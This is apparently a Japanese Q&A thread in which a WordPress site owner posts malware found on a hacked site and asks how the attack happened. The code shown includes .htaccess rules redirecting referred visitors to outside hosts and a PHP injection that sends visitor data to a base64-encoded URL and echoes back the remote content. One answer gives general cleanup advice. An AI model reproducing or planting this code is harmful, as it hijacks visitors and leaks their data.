-1

クライアント向けのワードプレスサイトを構築しました。数日後、クライアントは、サイトがマルウェア コンテンツのために Google によってブロックされたと報告しました。サイトを確認したところ、.htaccess に以前のものとは別のコードが含まれているなど、コードに変更が加えられていることがわかりました。 

 RewriteEngine On

 RewriteBase /

 RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)

 RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/$ [NC]

 RewriteRule ^.*$ http://clubatleticoestrada.org.ar/awas.html?h=1110720 [L,R]

</IfModule>



<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)
RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/\1$ [NC]
RewriteRule ^.*$ http://halisahamiz.com/eehs.html?h=1110720 [L,R]
</IfModule>


<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)
RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/\1$ [NC]
RewriteRule ^.*$ http://zabetonom.ru/mhos.html [L,R]
</IfModule>


RewriteEngine On

RewriteBase / 



# MCCL



# END MCCL

そしてindex.phpはこれを含んでいました:

if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
        $stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRFL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @$stCurlHandle = curl_init( $stCurlLink ); 
    }
    } 
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
    $sResult = @curl_exec($stCurlHandle); 
    if ($sResult[0]=="O") 
     {$sResult[0]=" ";
      echo $sResult; // Statistic code end
      }
     curl_close($stCurlHandle); 
}
}

この攻撃はどのように発生し、今後この攻撃を防ぐにはどうすればよいですか?

サイトをリセットしているときに、パブリック Html フォルダーの外部に影響を受けるファイルがいくつか見つかりました。今、誰がそれをどのように管理していますか?

4

1 に答える 1

2

「ハッカー攻撃」がどのように実行されるかを説明するには、大きなライブラリ全体では不十分です。Web サイトを攻撃する方法やツールは数多くあります。非常に一般的なSQL インジェクション、クロス スクリプト、パスワード盗用の他に、専門家が使用する高度なツールがあります。何が起こったのか理解できれば、彼らはあなたの Web サイトをリダイレクトしています。サーバーに最新のソフトウェア更新があることを確認し、このような「チェック ツール」またはAcunetixのようなサイトをチェックすることをお勧めします。. ハッカーは、脆弱な Web サイトを見つけるために同じことを行います。バックアップを再読み込みすれば問題が解決すると思われる場合は、驚くべきことが起こるかもしれません。ハッカーはバックドアをダウンロードし、サイトに戻ってきます。そのため、パスワードの変更が機能しない場合があります。丁寧に掃除することをお勧めします。また、同じサーバーでハッキングされた他のサイトがあるかどうか、プロバイダーに問い合わせてください。このような場合、サーバーにバックドア (シェル) があることを確認できます。この場合はあなたの問題ではありませんが、脆弱性を整理してサーバーをクリーンアップするのはプロバイダーの責任です。これは最も一般的な状況です。上記はすべて、問題の複雑さについて大まかな考えを示すためのものであり、このトピックがインターネット セキュリティ フォーラムに関するものであるという Adrien の意見に完全に同意します。

于 2013-05-16T16:42:08.430 に答える